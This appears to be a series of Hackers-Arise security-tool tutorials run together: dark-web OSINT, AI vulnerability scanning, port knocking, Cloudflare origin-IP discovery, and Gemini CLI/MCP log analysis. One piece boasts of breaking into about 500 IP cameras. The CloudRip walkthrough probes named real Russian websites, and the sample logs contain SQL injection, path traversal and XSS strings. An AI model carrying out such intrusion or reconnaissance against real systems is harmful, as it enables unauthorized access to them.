If you've ever conducted an OSINT investigation, you probably know that the dark web is one of the hardest places to investigate. Whether you're tracking ransomware groups or hunting for leaked passwords, manually searching through dark web results takes hours and returns mostly junk and malware. This is where AI can change how you investigate. By using Large Language Models, we can improve our searches and filter results faster. To do this, we have a tool called Robin.
In this article, we'll explore how to install this tool, how to use it, and what features it provides. Let's get rolling!
What is Robin?
Robin is an open-source tool for investigating the dark web. It uses AI to improve your searches, filter results from dark web search engines, and summarize what you find. What makes Robin particularly valuable is its multi-model support. You can easily switch between OpenAI, Claude, Gemini, or local models like Ollama depending on your needs, budget, and privacy requirements. The tool is CLI-first, built for terminal users who want to integrate dark web intelligence into their existing workflows.
Step #1: Install Robin
For this demonstration, I'll be using a Raspberry Pi as the hacking platform, but you can easily replicate all the steps on Kali or any other Debian-based distribution. To install the tool, we can use either the source code from GitHub or Docker. I will choose the first option. To begin, clone the repository:
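A minimal sketch of the clone step (the repository path reflects the official project location at the time of writing; verify it on GitHub before cloning):
pi> git clone https://github.com/apurvsinghgautam/robin.git
pi> cd robin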
As shown in the downloaded files, this is a Python project. We need to create a virtual environment and install the required packages.
pi> python -m venv venv
pi> source venv/bin/activate
pi> pip3 install -r requirements.txt
Before Robin can search the dark web, you need Tor running on your system. Install Tor by opening your terminal and executing the following command:
pi> sudo apt install tor
Step #2: Configure Your API Key
In this demonstration, I will be using Google's Gemini models. You can easily create an API key in Google AI Studio to access them. If you open the config.py file, you will see which models the tool supports.
Robin can be configured using either a .env file or system environment variables. For most users, creating a .env file in your Robin directory provides the cleanest approach. This method keeps your API credentials organized and makes it easy to switch between different configurations. Open the file in your preferred text editor and add your Gemini API key.
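A minimal .env sketch (the exact variable name is an assumption; check config.py or the project README for the name Robin expects):
GEMINI_API_KEY=your-api-key-here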
Step #3: Execute Your First Dark Web Investigation
First, let's open the help screen to see which options this tool supports and to verify that we installed it correctly.
pi> python3 main.py --help
Currently, we can see two supported modes for using this tool: CLI and web UI. I prefer CLI, so I will demonstrate that. Let's explore the help screen of the CLI mode.
pi> python3 main.py cli --help
It's a straightforward help screen; we simply need to specify an LLM model and our query. Let's search for credential exposure.
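A hypothetical invocation (the flag names here are assumptions for illustration; the actual ones are listed on the help screen above):
pi> python3 main.py cli -m gemini -q "leaked credentials example.com"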
After a few minutes of processing, Robin printed the gathered intelligence to the terminal. By default, it is formatted in Markdown and saved to a file named after the current date and time. To view the results with Markdown formatting, I'll use a command-line tool called glow.
pi> glow summary-xx-xx.md
The analysis examined various Tor-based marketplaces, vendors, and leak sources that advertise stolen databases and credentials. The findings reveal a widespread exposure of personally identifiable information (PII), protected health information (PHI), financial data, account credentials, and cryptocurrency private keys associated with major global organizations and millions of individuals. The report documents active threat actors, their tactics, and methods of monetization. Key risks have been identified, along with recommended next steps.
Understand the Limitations
While Robin is a powerful tool for dark web OSINT, it's important to understand its limits. The tool uses dark web search engines, which only index a small part of what's actually on hidden services. Many dark websites block indexing or require you to log in, so Robin can't reach them through automated searches. For thorough investigations, you'll still need to supplement what Robin finds with manual research and other OSINT methods.
The quality of Robin's intelligence summaries depends heavily on the LLM you're using and the quality of what it finds. Gemini 2.5 Flash gives great results for most investigations, but the AI can only work with the information in the search results. If your search doesn't match indexed content, or if the information you need is behind a login wall, Robin won't find it.
Summary
Conducting investigations on the dark web can be time-consuming when using traditional search tools. Since the dark web relies on anonymity networks, isn't indexed by standard search engines, and contains a vast amount of irrelevant information, manual searching can often be slow and ineffective. Robin addresses these challenges by leveraging AI to enhance your searches, intelligently filter results, and transform findings into useful intelligence reports. While this tool does have limitations, it can be a valuable addition to your arsenal when combined with manual searching and other OSINT tools.
If you're interested in deepening your knowledge of OSINT investigations or even starting your own investigation business, consider exploring our OSINT training to enhance your skills.
This article was first published at Hackers-Arise in April 2022, just 2 months after the Russians invaded Ukraine.
At the request of the IT Army of Ukraine, we were asked to help the war efforts by hacking a large number of IP cameras within Ukrainian territory. In this way, we can watch and surveil the Russian army in those areas. Should they commit further atrocities (we certainly pray they will not), we should be able to capture that on video and use it in the International Criminal Court. At the very least, we hope the word goes out to the Russian soldiers that we are watching and that constrains their brutality.
In a collaborative effort, our team (you all) has been able to hack into a very large number of cameras. We have nearly 500, and we are working on the remainder.
Here is a sampling of some of the cameras we now own for surveillance in Russia and Ukraine.
To learn more about hacking IP cameras, become a Subscriber Pro and attend our IP Camera Hacking training.
Welcome back, aspiring cyberwarriors and AI enthusiasts!
AI is stepping up in every aspect of our cybersecurity work: STRIDE-GPT generates threat models and mitigations for them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today, it's time to explore AI-powered vulnerability scanning.
In this article, we'll cover the BugTrace-AI toolkit from installation through advanced usage. We'll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Let's get rolling!
What Is BugTrace-AI?
BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.
The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.
It's important to recognize that this tool functions as an assistant rather than an automated exploitation tool. With that in mind, all of its findings should be deliberately validated.
Step #1: Installation
First of all, we need to clone the repository from GitHub:
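A sketch of the clone step (the repository path is a placeholder; substitute the project's actual GitHub URL):
kali> git clone https://github.com/<author>/BugTrace-AI.git
kali> cd BugTrace-AI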
After listing the contents of the downloaded directory, we can see the script we need: dockerizer.sh. We need to add execution permissions and launch it.
kali> chmod +x dockerizer.sh
kali> sudo ./dockerizer.sh
At this point, you may encounter an issue with the script, as it is currently incompatible with Docker Compose version 2 at the time of writing. To fix the script, you can manually change it or use the following:
#!/bin/bash
set -e

COMPOSE_FILE="docker-compose.yml"

echo "--- Stopping any previous containers... ---"
docker compose -f "$COMPOSE_FILE" down -v || \
  echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."

echo "--- Building and starting the application... ---"
docker compose -f "$COMPOSE_FILE" up --build -d

echo "--- Application is now running! ---"
echo "Access it at: http://localhost:6869"
echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"

# === Try to launch Firefox with checks ===
sleep 3 # Give the container a moment to start

if [ -z "$DISPLAY" ]; then
  echo "⚠️ No GUI detected (DISPLAY is not set)."
  echo "💡 Open http://localhost:6869 manually in your browser."
elif ! command -v firefox &> /dev/null; then
  echo "⚠️ Firefox is not installed."
  echo "💡 Install it with: sudo apt install firefox"
else
  echo "🚀 Launching Firefox..."
  firefox http://localhost:6869 &
fi
After updating the script, you should see the process of building the Docker image and starting the container in detached mode.
After it finishes, you can access BugTrace-AI at http://localhost:6869. You will see a disclaimer similar to the one below.
If you accept it, the app will load the main screen.
Step #2: Configuring API Access
BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you don't already have one. Navigate to the API keys section and generate a new key.
In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.
Step #3: Understanding the Three Scan Modes
BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.
The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.
The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains "simulated active" because it doesn't actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named "id" or "user" might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and offers guidance on how to test them manually.
The Grey Box Scan combines DAST with SAST by analyzing the page's live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.
For this exercise, we'll analyze a web application with the third mode.
The tool generates a report summarizing its findings.
BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.
Step #4: Payload Generation Tools
Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.
The tool generates a few dozen payloads. Each one includes an explanation of the obfuscation technique used and the specific WAF detection methods it's designed to evade.
Besides that, BugTrace-AI offers SSTI payload suggestions and an OOB Interaction Helper.
Summary
BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.
In this article, we installed the tool and tested some of its features. But this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.
If you want to dive deeper into using AI for hacking, consider checking out our AI for Cybersecurity training. This 7-hour video course, led by Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.
As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply won't do. That's where n8n comes into the picture: a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.
In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Let's get rolling!
What is n8n?
n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.
With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.
The Scenario: RSS Feed Monitoring with Matrix Notifications
For this tutorial, we're going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocol, essentially a privacy-focused alternative to Slack or Discord that you can self-host.
Step #1: Installing n8n on Raspberry Pi
Let's get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:
pi> curl -fsSL https://get.docker.com -o get-docker.sh
pi> sudo sh get-docker.sh
pi> sudo usermod -aG docker pi
Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:
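A sketch of such a command, reconstructed from the behavior described below (n8nio/n8n is the official image; the exact flags are assumptions):
pi> sudo mkdir -p /opt/n8n/data && sudo chown -R 1000:1000 /opt/n8n/data
pi> docker run -d --name n8n --restart unless-stopped -p 5678:5678 -v /opt/n8n/data:/home/node/.n8n -e N8N_SECURE_COOKIE=false n8nio/n8n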
This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it creates a persistent volume at /opt/n8n/data to store your workflows and credentials so they survive container restarts. Also, the service doesn't require an HTTPS connection; HTTP is enough.
Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.
Step #2: Understanding the n8n Interface
Once you're logged in and have created your first workflow, you'll see the n8n canvas: a blank workspace where you'll build your workflows. The interface is intuitive, but let me walk you through the key elements.
On the right side, you'll see a list of available nodes organized by category (press the Tab key). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).
The main canvas in the center is where you'll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.
Step #3: Creating Your First Workflow (RSS to Matrix)
Now let's build our RSS monitoring workflow. Click the "Add workflow" button to create a new workflow. Give it a meaningful name like "Security RSS to Matrix".
We'll start by adding our trigger node. Click the plus icon on the canvas and search for "RSS Feed Trigger". Select it, and you'll see the node configuration panel open on the right side.
In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, let's use the Hackers-Arise feed.
The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.
Click "Execute Node" to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like the title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.
Step #4: Configuring Matrix Integration
Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for "Matrix". Select the Matrix node and choose "Create a message" as the action.
Before we can use the Matrix node, we need to set up credentials. Click on "Credential to connect with" and select "Create New". You'll need to provide your Matrix homeserver URL, your Matrix username, and a password or access token.
Now comes the interesting part: composing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.
Here's a good message template that formats the RSS articles nicely:
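Something along these lines works well (adjust the wording to taste):
New article: {{ $json.title }}
Read it here: {{ $json.link }}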
Click the "Execute Workflow" button at the top. You should see the workflow execute and data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.
Once you've confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.
The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.
Summary
The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8n's practical value. Whether you're aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.
As you are aware, traditional security approaches typically involve firewalls that either allow or deny traffic to specific ports. The problem is that allowed ports are visible to anyone running a port scan, making them targets for exploitation. Port knocking takes a different approach: all ports appear filtered (no response) to the outside world until you send a specific sequence of connection attempts to predetermined ports in the correct order. Only then does your firewall open the desired port for your IP address.
Let's explore how this technique works!
What is Port Knocking?
Port knocking is a method of externally opening ports on a firewall by generating a connection-attempt sequence to closed ports. When the correct sequence of port "knocks" is received, the firewall dynamically opens the requested port for the source IP address that sent the correct knock sequence.
The beauty of this technique is its simplicity. A daemon (typically called knockd) runs on your server and monitors firewall logs or packet captures for specific connection patterns. When it detects the correct sequence, it executes a command to modify your firewall rules, usually opening a specific port for a limited time or for your specific IP address only.
The knock sequence can be as simple as attempting connections to three ports in order, like 7000, 8000, 9000, or as complex as a lengthy sequence with timing requirements. The more complex your sequence, the harder it is for an attacker to guess or discover through brute force.
The Scenario: Securing SSH Access to Your Raspberry Pi
For this tutorial, I'll demonstrate port knocking between a Kali Linux machine and a Raspberry Pi. This is close to a real-world scenario that many of you might use in your home lab or for remote management of IoT devices. The Raspberry Pi will run the knockd daemon and have SSH access hidden behind port knocking, while our Kali machine will perform the knocking sequence to gain access.
Step #1: Setting Up the Raspberry Pi (The Server)
Let's start by configuring our Raspberry Pi to respond to port knocking. First, we need to install the knockd daemon:
pi> sudo apt install knockd
The configuration file for knockd is located at /etc/knockd.conf. Let's open it.
Here's a default configuration that is recommended for beginners. The only thing I changed is the -A flag to -I, which inserts the rule at position 1 (the top) so it is evaluated before any DROP rules.
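The stock example shipped with knockd looks roughly like this, with the -I change applied (treat it as a starting point and pick your own sequence):
[options]
        UseSyslog

[openSSH]
        sequence    = 7000,8000,9000
        seq_timeout = 5
        command     = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn

[closeSSH]
        sequence    = 9000,8000,7000
        seq_timeout = 5
        command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
        tcpflags    = syn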
The [openSSH] section defines our knock sequence: connections must be attempted to ports 7000, 8000, and 9000 in that exact order. The seq_timeout of 5 seconds means all three knocks must occur within 5 seconds of each other. When the correct sequence is detected, knockd executes the iptables command to allow SSH connections from your IP address.
The [closeSSH] section does the reverse: it uses the knock sequence in reverse order (9000, 8000, 7000) to close the SSH port again.
Now we need to enable knockd to start on boot:
pi> sudo vim /etc/default/knockd
Change the line START_KNOCKD=0 to START_KNOCKD=1 and make sure the network interface is set correctly.
Step #2: Configuring the Firewall
Before we start knockd, we need to configure our firewall to block SSH by default. This is critical because port knocking only works if the port is actually closed initially.
pi> sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
pi> sudo iptables -A INPUT -p tcp --dport 22 -j DROP
pi> sudo iptables -A INPUT -j DROP
These rules allow established connections to continue (so your current SSH session won't be dropped), block new SSH connections, and drop all other incoming traffic by default.
Your Raspberry Pi is now configured and waiting for the secret knock! From the outside world, SSH appears filtered.
Step #3: Installing Knock Client on Kali Linux
Now let's switch to our Kali Linux machine. We need to install the knock client, which is the tool we'll use to send our port knocking sequence.
kali> sudo apt-get install knockd
The knock client is actually part of the same package as the knockd daemon, but we'll only use the client portion on our Kali machine.
Step #4: Performing the Port Knock
Before we try to SSH to our Raspberry Pi, we need to perform our secret knock sequence. From your Kali Linux terminal, run:
kali> knock -v 192.168.0.113 7000 8000 9000
The knock client is sending TCP SYN packets to each port in sequence. These packets are being logged by the knockd daemon on your Raspberry Pi, which recognizes the pattern and opens SSH for your IP address.
Now, immediately after knocking, try to SSH to your Raspberry Pi:
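Assuming the Pi's address from the knock above and the default pi user:
kali> ssh pi@192.168.0.113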
If everything is configured correctly, you should connect successfully! The knockd daemon recognized your knock sequence and added a temporary iptables rule allowing your IP address to access SSH.
When you're done with your SSH session, you can close the port again by sending the reverse knock sequence:
kali> knock -v 192.168.0.113 9000 8000 7000
Step #5: Verifying Port Knocking is Working
Let's verify that our port knocking is actually providing security. Without performing the knock sequence first, try to SSH directly to your Raspberry Pi:
The connection should hang and eventually time out. If you run nmap against your Raspberry Pi without knocking first, you'll see that port 22 appears filtered:
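For example (using the Pi's address from earlier):
kali> nmap -p 22 192.168.0.113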
Now perform your knock sequence and immediately scan again:
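Using the same example address:
kali> knock -v 192.168.0.113 7000 8000 9000
kali> nmap -p 22 192.168.0.113
This time the scan should report port 22 as open for your IP.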
This demonstrates how port knocking keeps services filtered until the correct sequence is provided.
Summary
Port knocking is a powerful technique for adding an extra layer of security to remote access services. By requiring a specific sequence of connection attempts before opening a port, it makes your services harder for attackers to detect and reduces your attack surface. But remember that port knocking should be part of a defense-in-depth strategy, not a standalone security solution.
Cloudflare has built an $80 billion business protecting websites. This protection includes mitigating DDoS attacks and shielding origin IP addresses from disclosure. Now we have a tool that can disclose those sites' IP addresses despite Cloudflare's protection.
As you know, many organizations deploy Cloudflare to protect their main web presence, but they often forget about subdomains. Development servers, staging environments, admin panels, and other subdomains frequently sit outside of Cloudflare's protection, exposing the real origin IP addresses. CloudRip is a tool specifically designed to find these overlooked entry points by scanning subdomains and filtering out Cloudflare IPs to show you only the real server addresses.
In this article, we'll install CloudRip, test it, and then summarize its benefits and potential drawbacks. Let's get rolling!
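Step #1: Installing CloudRip
First, download the tool from its repository (the path below is a placeholder; use the project's actual GitHub URL):
kali> git clone https://github.com/<author>/CloudRip.git
kali> cd CloudRip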
Now we need to install the dependencies. CloudRip requires only two Python libraries: colorama for colored terminal output and pyfiglet for the banner display.
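Both can be pulled in with pip:
kali> pip3 install colorama pyfiglet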
You're ready to start finding real IP addresses behind Cloudflare protection. The tool comes with a default wordlist (dom.txt), so you can begin scanning immediately.
Step #2: Basic Usage of CloudRip
Let's start with the simplest command to see CloudRip in action. For this example, I'll use some Russian websites behind Cloudflare, found via BuiltWith.
Before scanning, let's confirm the website is registered in Russia with the whois command:
kali> whois esetnod32.ru
The NS servers are from Cloudflare, and the registrar is Russian. Use dig to check whether Cloudflare proxying hides the real IP in the A record.
kali> dig esetnod32.ru
The IPs belong to Cloudflare. We're ready to test out CloudRip on it.
kali> python3 cloudrip.py esetnod32.ru
The tool tests common subdomains (www, mail, dev, etc.) from its wordlist, resolves their IPs, and checks if they belong to Cloudflare.
In this case, we can see that the main website is hiding its IP via Cloudflare, but the subdomains' IPs don't belong to Cloudflare.
Step #3: Advanced Usage with Custom Options
CloudRip provides several command-line options that give you greater control over your reconnaissance.
Here's the full syntax with all available options:
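Reconstructed from the option descriptions below (a sketch, not the tool's literal usage string):
kali> python3 cloudrip.py <domain> [-w wordlist] [-t threads] [-o output_file]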
-w (wordlist): This allows you to specify your own subdomain wordlist. While the default dom.txt is quite good, experienced hackers often maintain their own customized wordlists tailored to specific industries or target types.
-t (threads): This controls how many threads CloudRip uses for scanning. The default is 10, which works well for most situations. However, if you're working with a large wordlist and need faster results, you can increase this to 20 or even higher. Just be mindful that too many threads might trigger rate limiting or appear suspicious.
-o (output file): This saves all discovered non-Cloudflare IP addresses to a text file.
Step #4: Practical Examples
Let me walk you through a scenario to show you how CloudRip fits into a real engagement.
Scenario 1: Custom Wordlist for Specific Target
After running subfinder, some unique subdomains were discovered:
kali> subfinder -d rp-wow.ru -o rp-wow.ru.txt
Let's filter them down to subdomain labels only.
kali> grep -v '^rp-wow.ru$' rp-wow.ru.txt | sed 's/\.rp-wow\.ru$//' > subdomains_only.txt
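We can then feed that list back into CloudRip (the output filename is illustrative):
kali> python3 cloudrip.py rp-wow.ru -w subdomains_only.txt -o rp-wow-ips.txt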
CloudRip excels at its specific task. Rather than trying to be a Swiss Army knife, it focuses on one aspect of reconnaissance and does it well.
The multi-threaded architecture provides a good balance between speed and resource consumption. You can adjust the thread count based on your needs, but the defaults work well for most situations without requiring constant tweaking.
Potential Drawbacks
Like any tool, CloudRip has limitations that you should understand before relying on it heavily.
First, the tool's effectiveness depends entirely on your wordlist. If the target organization uses unusual naming conventions for its subdomains, even the best wordlist might miss them.
Second, security-conscious organizations that properly configure Cloudflare for ALL their subdomains will leave little for CloudRip to discover.
Finally, CloudRip only checks DNS resolution. It doesn't employ more sophisticated techniques like analyzing historical DNS records or examining SSL certificates for additional domains. It should be one tool in your reconnaissance toolkit, not your only tool.
Summary
CloudRip is a simple and effective tool that helps you find real origin servers hidden behind Cloudflare protection. It works by scanning many possible subdomains and checking which ones use Cloudflareβs IP addresses. Any IPs that do not belong to Cloudflare are shown as possible real server locations.
The tool is easy to use, requires very little setup, and automatically filters results to save you time. Both beginners and experienced cyberwarriors can benefit from it.
Test it out; it may become another tool in your hacker's toolbox.
Welcome back, aspiring cyberwarriors and AI users!
If you're communicating with AI assistants via a browser, you're doing it the slow way. Any content, such as code, must first be pasted into the chatbot and then copied back to the working environment. If you are working on several projects, you end up with a whole pile of chats, and gradually the AI loses context in them. To solve all these problems, we have AI in the terminal.
In this article, we'll explore how to leverage the Gemini CLI for cybersecurity tasks: specifically, how it can accelerate Python scripting. Let's get rolling!
Step #1: Get Ready
Our test harness centers on the MCP server we built for log analysis, covered in detail in a previous article. While it shines with logs, the setup is completely generic and can be repurposed for any data-processing workload.
At this point, experienced users might ask why we need the MCP server if Gemini can already do the same thing by default. The answer is simple: we have more control. We don't want to give the AI access to the whole system, so we limit it to a specific environment. Moreover, this setup gives us the opportunity for customization: we can add new functions, restrict existing ones according to our needs, or integrate additional tools.
Here is a demonstration of the restriction:
Step #2: Get Started With The Code
If you don't write code frequently, you'll forget how your scripts work. When the moment finally arrives, you can ask an AI to explain them to you.
We simply specified the script and got an explanation, without any copying, pasting, or uploading to a browser. Everything was done in the terminal in seconds. Now, let's say we want to improve the code's style according to PEP 8, the official Style Guide for Python.
The AI asks for approval for every edit and visually represents the changes. If you agree, it summarizes the updates at the end.
Interestingly, the AI changed whitespace in the code and broke the script, because the network range ended up specified incorrectly.
So, in this case, the AI didn't understand the context, but after fixing the issue, everything worked as intended.
Let's see how we can use Gemini CLI to improve our workflow. First, let's ask for recommendations for improving the script.
And, immediately after suggesting the changes, the AI begins implementing the improvements. Let's follow that.
A few lines of code were added, and it looks pretty clean. Now, let's shift our focus to improving error handling rather than the scanning functionality.
Let's run the script.
Errors are caught reliably, and the script executes flawlessly. Once it finishes, it outputs the list of discovered live hosts.
Step #3: Gemini CLI Tools
By typing /tools, we can see what the Gemini CLI allows us to do by default.
But one of the most powerful tools is /init. It analyzes the project and creates a tailored Markdown file.
Basically, the Gemini CLI writes a file of instructions for itself, allowing it to understand the context of what we're working on.
Each time we run the Gemini CLI, it loads this file and understands the context.
We can close the app, reopen it later, and it will pick up exactly where we left off, without any extra explanation. Everything remains neatly organized.
Summary
By bringing the assistant straight into your command line, you keep the workflow tight, the context local to the files you're editing, and the interaction essentially instantaneous.
In this article, we examined how the Gemini CLI can boost the effectiveness of writing Python code for cybersecurity, and we highlighted the advantages of using the MCP server along with the built-in tools that Gemini provides by default.
Keep returning, aspiring hackers, as we continue to explore MCP and the application of artificial intelligence in cybersecurity.
In our previous article, we examined the architecture of MCP and explained how to get started with it. Hundreds of MCP servers have been built for different services and tasks; some are dedicated to cybersecurity activities such as reverse engineering or reconnaissance. Those servers are impressive, and we'll explore several of them in depth here at Hackers-Arise.
However, before we start "playing" with other people's MCP servers, I believe we should first develop our own. Building a server ourselves lets us see exactly what's happening under the hood.
For that reason, in this article, we'll develop an MCP server for analyzing security logs. Let's get rolling!
Step #1: Fire Up Your Kali
In this tutorial, I will be using the Gemini CLI with MCP on Kali Linux. You can install Gemini using the following command:
kali> sudo npm install -g @google/gemini-cli
Now we have a working AI assistant, but it doesn't yet have access to any of our security tools.
Step #2: Create a Security Operations Directory Structure
Before we start configuring MCP servers, let's set up a proper directory structure for our security operations. This keeps everything organized and makes it easier to manage permissions and access controls.
Create a dedicated directory for security analysis work in your home directory.
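One way to do it (the subdirectory names are assumptions based on the description below):
kali> mkdir -p ~/security-ops/{logs,analysis,samples,artifacts}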
This creates a security-ops directory with subdirectories for logs, analysis reports, malware samples, and other security artifacts.
Let's also create a directory to store any custom MCP server configurations we build.
kali> mkdir -p ~/security-ops/mcp-servers
For testing purposes, let's create some sample log files we can analyze. In a real environment, you'd be analyzing actual security logs from your infrastructure.
First, let's create a sample web application firewall log.
kali> vim ~/security-ops/logs/waf-access.log
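A few illustrative entries you can paste in (fabricated IPs and timestamps, covering the event types described below):
192.168.1.50 - - [15/Mar/2025:10:23:45 +0000] "GET /products.php?id=1' OR '1'='1-- HTTP/1.1" 403 512
203.0.113.42 - - [15/Mar/2025:10:24:10 +0000] "GET /../../../etc/passwd HTTP/1.1" 403 233
203.0.113.42 - - [15/Mar/2025:10:24:55 +0000] "POST /login HTTP/1.1" 401 187
198.51.100.7 - - [15/Mar/2025:10:25:30 +0000] "GET /search?q=<script>alert(1)</script> HTTP/1.1" 403 301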
This sample log contains various types of suspicious activity, including SQL injection attempts, directory traversal, authentication failures, and XSS attempts. We'll use this to demonstrate MCP's log analysis capabilities.
Let's also create a sample authentication log.
kali> vim ~/security-ops/logs/auth.log
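Again, a few fabricated lines are enough to simulate a brute-force pattern:
Mar 15 10:26:01 kali sshd[2301]: Failed password for root from 203.0.113.42 port 51122 ssh2
Mar 15 10:26:04 kali sshd[2301]: Failed password for root from 203.0.113.42 port 51123 ssh2
Mar 15 10:26:08 kali sshd[2305]: Failed password for admin from 203.0.113.42 port 51127 ssh2
Mar 15 10:26:12 kali sshd[2310]: Accepted password for pi from 203.0.113.42 port 51130 ssh2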
Now we have some realistic security data to work with. Let's configure MCP to give Gemini controlled access to these files.
Step #3: Configure MCP Server for Filesystem Access
The MCP configuration file lives at ~/.gemini/settings.json. This JSON file tells Gemini CLI which MCP servers are available and how to connect to them. Let's create our first MCP server configuration for secure filesystem access.
Check if the .gemini directory exists, and create it if it doesn't.
kali> mkdir ~/.gemini
Now edit the settings.json file. We'll start with a basic filesystem MCP server configuration.
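A minimal configuration along the lines described below (the server name matches what we reference later; the package is the official filesystem server from the MCP project):
{
  "mcpServers": {
    "security-filesystem": {
      "command": "npx",
      "args": [
        "-y",
        "@modelcontextprotocol/server-filesystem",
        "/home/kali/security-ops"
      ]
    }
  }
}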
This sets up a filesystem MCP server with restricted access to only our security-ops directory. First, it uses npx to run the MCP server, which means it will automatically download and execute the official filesystem server from the Model Context Protocol project. The -y flag tells npx to proceed without prompting. The server-filesystem package is the official MCP server for file operations. Second, and most critically, we're explicitly restricting access to only the /home/kali/security-ops directory. The filesystem server will refuse to access any files outside this directory tree, even if Gemini tries to. This is defense in depth, ensuring the AI cannot accidentally or maliciously access sensitive system files.
Now, let's verify that the MCP configuration is valid and the server can connect. Start Gemini CLI again.
kali> gemini
After running, we can see that 1 MCP server is in use and Gemini is running in the required directory.
Now, use the /mcp command to list configured MCP servers.
/mcp list
You should see output showing the security-filesystem server with a "ready" status. If you see "disconnected" or an error, double-check your settings.json file for typos and make sure nodejs, npm, and npx are installed.
Now let's test the filesystem access by asking Gemini to read one of our security logs. This demonstrates that MCP is working and Gemini can access files through the configured server.
> Read the file ~/security-ops/logs/waf-access.log and tell me what security events are present
Pretty clear summary. The key thing to understand here is that Gemini itself doesn't have direct filesystem access. It's asking the MCP server to read the file on its behalf, and the MCP server enforces the security policy we configured.
Step #4: Analyzing Security Logs with Gemini and MCP
Now that we have MCP configured for filesystem access, let's do some real security analysis. Let's start by asking Gemini to perform a comprehensive analysis of the web application firewall log we created earlier.
> Analyze ~/security-ops/logs/waf-access.log for attack patterns. For each suspicious event, identify the attack type, the source IP, and assess the severity. Then provide recommendations for defensive measures.
The analysis might take a few seconds as Gemini processes the entire log file. When it completes, you'll get a detailed breakdown of the security events along with recommendations, like implementing rate limiting for the attacking IPs, ensuring your WAF rules are properly configured to block these attack patterns, and investigating whether any of these attacks succeeded.
Now let's analyze the authentication log to identify potential brute force attacks.
